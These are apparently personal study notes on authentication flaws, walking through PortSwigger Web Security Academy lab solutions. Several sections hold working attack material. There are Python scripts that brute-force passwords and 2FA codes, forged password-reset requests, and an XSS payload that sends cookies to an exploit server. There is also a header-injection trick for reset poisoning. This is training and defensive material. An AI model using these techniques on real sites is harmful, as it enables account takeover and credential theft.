# Authentication Failure

* Validate the user (WHO AM I)
* Verifying the user who claims to be.

## Weak Password Complexity Requirement

{% stepper %}
{% step %}
### SHARPASS

Shared Password: same password across multiple accounts

Example: Gmail, Netflix, OneDrive

Vulnerable to: Credentials Stuffing
{% endstep %}

{% step %}
### UNIQPASS

Unique Password: The password is unique but short, simple and has personal information.

Example: DOB, School, Family name

Vulnerable to: Password Guessing
{% endstep %}

{% step %}
### QUALPASS

Quality password: Password is long, unique and strong with special characters

Example: `asjdn3wih52@#!@4`

Vulnerable to: DUMPS / CRACKING
{% endstep %}

{% step %}
### PASSMAN

Password Manager: Password stored in encrypted manager

Example: LastPass, 1password

Vulnerable to: TAKEOVER / Account RESET
{% endstep %}

{% step %}
### SMS2FA

SMS based 2FA authentication code: with password manager get MFA code sent by SMS message

Example: SMS based Authentication

Vulnerable to: PHISING / SIM SWAPPING
{% endstep %}

{% step %}
### APP2FA

Application based 2FA authentication code: with password manager get MFA code generated by application.

Example: DUO, Authenticator

Vulnerable to: MALWARE / PHISHING
{% endstep %}

{% step %}
### CODELESS

Application based 2FA authentication codeless: with password manager get the prompt to accept or deny the authentication attempt.

Example: Microsoft Auth

Vulnerable to: MALWARE
{% endstep %}

{% step %}
### PASSLESS

Password less: with additional to password manager 2FS comes with physical token or trusted device approval

Example: WEBAUTHN

Vulnerable to: HARDWARE Components
{% endstep %}
{% endstepper %}

## Password Requirement

* Short password
* Common words
* Password similar as username
* Default password
* Missing MFA

## Insecure Login Page

* Allow brute force or more.
* Login page
* OTP & MFA page
* Change password page

## Insecure Forget Password

* A security question answer is finite and, with a bit of research, the answer is guessable.

## Insecure MFA Not Blind to UserID

* A userid is not blind, so attacker trick the web application login in with the attacker credentials and at the MFA code used the victim username which will login into victim username.

## Insecure Store Credentials

* A plain text or encrypted is used to store credentials
* Credentials should be stored using strong hash algo.

## Username Enumeration

* An attacker observes changes on the website to find whether the given username is valid.
* Entering valid username and invalid password will prompt enter username is valid or username is already taken on register forms this will reduce the time of brute force.

## How to

* Validate the weak password complexity requirements
* Check the website password description. Like how many characters, number, special character and match it with password complexity scale.
* If self-registration is there creating several accounts with different weak password to know the password rule.
* Try and register short and common password
* Password same as username
* After login then attempt to change the password to weak value sometime rules are applied in login function but forget to apply in change password function

## Authentication Attempts

* Submit bad login attempt to check the brute force protection to account that controllable.
* If the account is locked maybe the account locked function is vulnerable like its used cookie to keep track of failed number of attempts.

## Error Message

* Submit a valid username and invalid password and make notes of the response.
* Submit an invalid username and invalid password and make notes of the response.
* Review both response and check for difference in status code, any redirects, information displayed in scrren, HTML Source code or the time to process the request.
* If there is a difference run the brute force to enumerate the list of valid usernames.

## Insecure Transmission of Credentials

* Login in with the given user then use Wireshark to check that packet of clint and server.
* Look for where credentials is given in URL Query string or as a cookie are transmitted back to client
* If HTTPS is used change to HTTP and check any redirection.

## Insecure Forget Password Function

* Intercept all the requests and response while completing the change password walkthrough.
* Check if username enumeration or brute force can be done.
* If the application contains email recovery, then capture the URL and check any predicable pattern or sensitive information in URL and check is long live and doesn’t expire.

## Insecure Multistage Login Function

* Perform a complete walk through using an controllable account while intercepting the request response in burp
* Check if username enumeration or brute force attack
* Example: A userid is not blind so attacker trick the web application login in with the attacker credentials and at the MFA code used the victim username which will login into victim username.

## Insecure Password Stored

* Check the password in Wireshark this will give an idea how the password is stored in database
* In get the RCE on the server then check the password are stored insecurely.

## Prevent

* Implement MFA
* Change all the default credentials
* Used encrypted connection
* Only POST requests should be used when the credentials are going to the server.
* Stored credentials should be hashed and salted.
* Used same error massages in the login form when the credentials are invalid.
* Implement an password policy of NIST 800-63b guidelines.
* Implement robust brute force protection.

## PortSwigger Labs

### Username Enumeration via Different Responses

Home Page

Myaccount

Login Page

Intruder

The 0 is has length 3248 which is the default of normal response.

The 12 response has the maximum length which means user is ftp.

Now the password

### 2FA Simple Bypass

User has 2FA enable

Carlos

Refresh the page

### Password Reset Broken Logic

Forget-password

`GET /forgot-password?temp-forgot-password-token=m8ommnhm7qu5gezjamfuuixk1zslz13b HTTP/2`

password

New Password request

`POST /forgot-password?temp-forgot-password-token=m8ommnhm7qu5gezjamfuuixk1zslz13b HTTP/2`

Change the username to carlos

new password request Confirm password

`POST /forgot-password?temp-forgot-password-token=m8ommnhm7qu5gezjamfuuixk1zslz13b HTTP/2*username=carlos&new-password-1=password&new-password-2=password`

password

### Username Enumeration via Subtly Different Responses

Just the ID is changing

Used the wrong response and negative search

mysql

The developer made mistake when the username is correct the dot is not there in the response.

Password

`username=mysql&password=michelle`

### Username Enumeration via Response Timing

Invalid username and password under 200

Account locket

Use the X-Forwarded-For to bypass the lock out.

Valid Username and invalid password under 400

Valid username and invalid long password under 1000

Intruder

Password

`username=akamai&password=ranger`

### Broken Brute-Force Protection, IP Block

Home Page

This is the vulnerability the web application is response whether the username is incorrect or password.

Second time incorrect

Third time incorrect

Soft lock

After some time let see login with the validate credentials.

So after entering valid credence the soft lock mechinesim reset

We can use this to brute force carlos password by using two carlos password and one valid credence of wiener.

```python
print("###########The following are the usernames:###############")

for i in range(150):

if i % 3:

print("carlos")

else:

print("wiener")

print("##############The following are the passwords:############")

with open('passwords.txt', 'r') as f:

lines = f.readlines()

i = 0

for pwd in lines:

if i % 3:

print(pwd.strip('\n'))

else:

print("peter")

print(pwd.strip('\n'))

i = i+1

i = i +1
```

Output

```
###########The following are the usernames:###############
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
wiener
carlos
carlos
##############The following are the passwords:############
peter
123456
password
peter
12345678
qwerty
peter
123456789
12345
peter
1234
111111
peter
1234567
dragon
peter
123123
baseball
peter
abc123
football
peter
monkey
letmein
peter
shadow
master
peter
666666
qwertyuiop
peter
123321
mustang
peter
1234567890
michael
peter
654321
superman
peter
1qaz2wsx
7777777
peter
121212
000000
peter
qazwsx
123qwe
peter
killer
trustno1
peter
jordan
jennifer
peter
zxcvbnm
asdfgh
peter
hunter
buster
peter
soccer
harley
peter
batman
andrew
peter
tigger
sunshine
peter
iloveyou
2000
peter
charlie
robert
peter
thomas
hockey
peter
ranger
daniel
peter
starwars
klaster
peter
112233
george
peter
computer
michelle
peter
jessica
pepper
peter
1111
zxcvbn
peter
555555
11111111
peter
131313
freedom
peter
777777
pass
peter
maggie
159753
peter
aaaaaa
ginger
peter
princess
joshua
peter
cheese
amanda
peter
summer
love
peter
ashley
nicole
peter
chelsea
biteme
peter
matthew
access
peter
yankees
987654321
peter
dallas
austin
peter
thunder
taylor
peter
matrix
mobilemail
peter
mom
monitor
peter
monitoring
montana
peter
moon
moscow
```

Intuder Setting

Username

Passwrd

Resource pool

### Username Enumeration via Account Lock

Send request multiplies time its says incorrect username and password

So even when the username is wrong if the username is correct it output is different which is too many incorrect login attempts

### 2FA Broken Logic

Home Page

Request login as winer

Repeater

GET request which send the MFA code to the email so its authenticated using two factor authentication.

Endpoint to where its require MFA Code

Repeater

Login to wiener

The second request endpoint `/login2` which generate the 2FA in cookie parameter there is two parameter

Vuln

* `/session`
* `/verify` which send the 2fa token to that use

Don’t have the access to carlos email clinet

Authentication decision and session management is broken.

Remove the session token in MFA request

Which means need the correct MFA code.

Change the user to carlos

Need to guess the MFA token first check any brute force defence by sending the request 5 times

Send the request multiply times

No brute force defence is there.

Intruder

Before starting intruder first send the MFA to carlos email clinet

Change the session ID to carlos and add the carlos in my account and remove the verify parameter.

### Brute-Forcing a Stay-Logged-In Cookie

Home Page

Without session

After login it send the request to myaccount page

Decode

So the format is

`Base64[winer:MD5(peter)]`

Send the my account page to intruder

Remove the session cookie

Paste the candidate list

And use the encoding format

Change the session parameter to carlos

Carlos:access

### Offline Password Cracking

Login in as a wiener to checked the endpoint and the functionality

Got the staylogin

Decoding

So the staylogin has `base64[wiener:md5(peter)]`

In the blog its uses the staylogin

As per the given information this also vulnerably to XSS

Exploit server access logs

```
secret=wnqF9ZgHRCXLCmTN2VSHADl2JeDrFbP4;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz HTTP/1.1"
```

Login as carlos

### Password Reset Poisoning via Middleware

So in the first request where its ask for username its can add header injection `X-Forwarded-Host` and the exploit server.

The request did come now change the user

When carlos open the link its not going to redirect anywhere and its will logs in my logs server

```
10.0.4.215      2024-07-27 14:55:22 +0000 "GET /forgot-password?temp-forgot-password-token=1bl2vxy0s6atb1pvq2uio4rq4fqs563e HTTP/1.1" 404 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
```

it’s a valid token

Submit an invalid token

### Password Brute-Force via Password Change

Home Page

if enter the wrong password in current-password it will redirect to login page

After two three attempts got soft lock brute force protection.

After login again

Scenrio:

1. Current password is incorrect and new password doesn’t match its show: Current Password incorrect.
2. Current password is correct and new password doesn’t match its show: New Password do not macth

Send the request multiply times its not soft blocking.

the session is not blind to wiener

Intruder

Found

123321

### Broken Brute-Force Protection, Multiple Credentials per Request

Home Page

Any invalid password

Its in the JSON format try to add mulutpy array of password and see the application accept it

Script

```python
print("[", end='')

with open('password.txt', 'r') as f:
    lines = f.readlines()

for pwd in lines:
    print('"' + pwd.rstrip("\n") + '",', end='')

print('"random"]', end='')
```

Output

```
PS G:\My Drive\Hasanrehni\WraithFall\ShadowGuardain\Programming\Python\Authentication> python .\convert-pwd-format.py

["123456","password","12345678","qwerty","123456789","12345","1234","111111","1234567","dragon","123123","baseball","abc123","football","monkey","letmein","shadow","master","666666","qwertyuiop","123321","mustang","1234567890","michael","654321","s"superman","1qaz2wsx","7777777","121212","000000","qazwsx","123qwe","killer","trustno1","jordan","jennifer","zxcvbnm","asdfgh","hunter","buster","soccer","harley","batman","andrew","tigger","sunshine","iloveyou","2000","charlie","robert","thomas","hockey","ranger","daniel","starwars","klaster","112233","george","computer","michelle","jessica","pepper","1111","zxcvbn","555555","11111111","131313","freedom","777777","pass","maggie","159753","aaaaaa","ginger","princess","joshua","cheese","amanda","summer","love","ashley","nicole","chelsea","biteme","matthew","access","yankees","987654321","dallas","austin","thunder","taylor","matrix","mobilemail","mom","monitor","monitoring","montana","moon","moscow","random"]
```

PS G:\My Drive\Hasanrehni\WraithFall\ShadowGuardain\Programming\Python\Authentication>

One of this password is accepted

Change the session id to the carlos one

### 2FA Bypass Using a Brute-Force Attack

First GET request which take to login

Second request which login as a user

MFA request

After 2 times invalid MFA Code its logout

Setting

Frist request

Second username and password

Third MFA request

Use ctrl and select all three

I give up using marco because of this

Script

```python
import requests

from threading import Thread

from time import sleep

from bs4 import BeautifulSoup

def sendRequest(url, number):
    # Display current number and use \r to clear previous line
    print(f'[*] Trying number: {number}', end='\r')

    session = requests.Session()

    # Get login CSRF token
    login1Request = session.get(url + '/login')

    soup = BeautifulSoup(login1Request.text, 'html.parser')

    login1CsrfToken = soup.find('input', {'name': 'csrf'}).get('value')

    login1Data = {
        'csrf': login1CsrfToken,
        'username': 'carlos',
        'password': 'montoya'
    }

    # Login as user carlos
    login1RequestResponse = session.post(url + '/login', data=login1Data)

    # Get 2FA page CSRF token
    login2Request = session.get(url + '/login2')

    soup = BeautifulSoup(login2Request.text, 'html.parser')

    login2CsrfToken = soup.find('input', {'name': 'csrf'}).get('value')

    login2Data = {
        'csrf': login2CsrfToken,
        'mfa-code': number
    }

    # Enter 2FA code
    result = session.post(url + '/login2', data=login2Data)

    if 'Incorrect security code' not in result.text:
        print(f'[+] Found security code: {number}')

def main():
    url = 'https://0a3200f1034645cbacfc0937006400d6.web-security-academy.net'

    # Generate number 0000 to 9999 into a list
    listNumbers = [f'{i:04d}' for i in range(10000)]

    for number in listNumbers:
        thread = Thread(target=sendRequest, args=(url, number))
        thread.start()

        # You can adjust how fast of each connection. 0.2s is recommended.
        sleep(0.2)

if __name__ == '__main__':
    main()
```

## Testing

### Username Enumeration

Test if you can find valid usernames by seeing how the system responds to invalid usernames.

### 2FA Bypass

Try to bypass multi-factor authentication (MFA) by analyzing and manipulating the MFA request to see if you can get around it.

### Password Reset Logic Flaws

* Test Endpoints
  * Check endpoints like `/forgot-password` or `/email`.
* GET Request
  * Use a GET request with a temporary token to see if you can access the reset functionality.
  * Example: `GET /forgot-password?token=YOUR-TOKEN`
* POST Request
  * Send a POST request with the token and new password details.
  * Example: `POST /forgot-password?token=YOUR-TOKEN`
  * Body: `username=carlos&new-password-1=password&new-password-2=password`
* Test with Different Usernames
  * Generate the Wiener token and change the username to carlos.

### Username Enumeration via Response Codes

* Check if different responses (like status code 302) indicate valid or invalid usernames during enumeration.

### Username Enumeration via Response Timing

* Enter random username and password and check the response.
* Check the response timing with valid and invalid username and password.
* Enter the valid username and invalid password, password with long text, and check the timing. If the username is valid then it takes time to check the long password which results in time delay.

### Broken Brute-Force Protection, IP Block

* Have a soft lock feature after 3 times which will reset after valid credential.
* Use brute force where two incorrect password for carlos and one valid credential of wiener until got the carlos password.

### Username Enumeration via Account Lock

* Observe if the system provides different error messages for valid and invalid usernames or passwords when an account is locked.

### 2FA Broken Logic

* Attempt to brute-force MFA codes and then use a valid session ID to gain unauthorized access.

### Brute-Forcing a Stay-Logged-In Cookie

* Cookie parameter has stay-in which has `base64[wiener:MD5(peter)]`
* Found there is no brute force defence.
* Using the `password.txt` with md5 hash password, add prefix carlos: and encoded with base64 and found the password and change the session id to carlos.

### Offline Password Cracking

* Found the same stay-login with same pattern and has XSS vulnerability in comment section.
* Add a XSS payload:

```javascript
<script>document.location='https://exploit.server'+documemt.cookie</script>
```

* Got the stay-login hash in exploit access log decode it and login as carlos and delete carlos account.

### Password Reset Poisoning via Middleware

* Forget password link and add `X-Forwarded-Host:explot.server` (header injection) where the carlos the forget password link and its not't redirect to anywhere and got the logs in exploit access server in logs where its has temp-token and use that temp-token in changing password request and changed the password and login as the changed password.

### Password Brute-Force via Password Change

* Login as wiener.
* Change the password there is soft block in password wait 1 min.

Scenrio:

1. Current password is incorrect And new password doesn’t match its show : Current Password incorrect.
2. Current password is correct and new password doesn’t match its show : New Password do not match

* So brute is possible when the password does not match and brute force the carlos password.

### Broken Brute-Force Protection, Multiple Credentials per Request

* The password its in json format so added the array of password and one of the password is accepted.
* Used the session token and loged as carlos.

### 2FA Bypass Using a Brute-Force Attack

* There is three step to login in: first the login page, the second request is where its take the user crednetails and the third is the MFA code.
* To crack this i have to repeat this 3 request at the same time and brute force its to find the correct MFA code.
* Because after two invalid attempted will backoff to the login page with CSRF token changed.
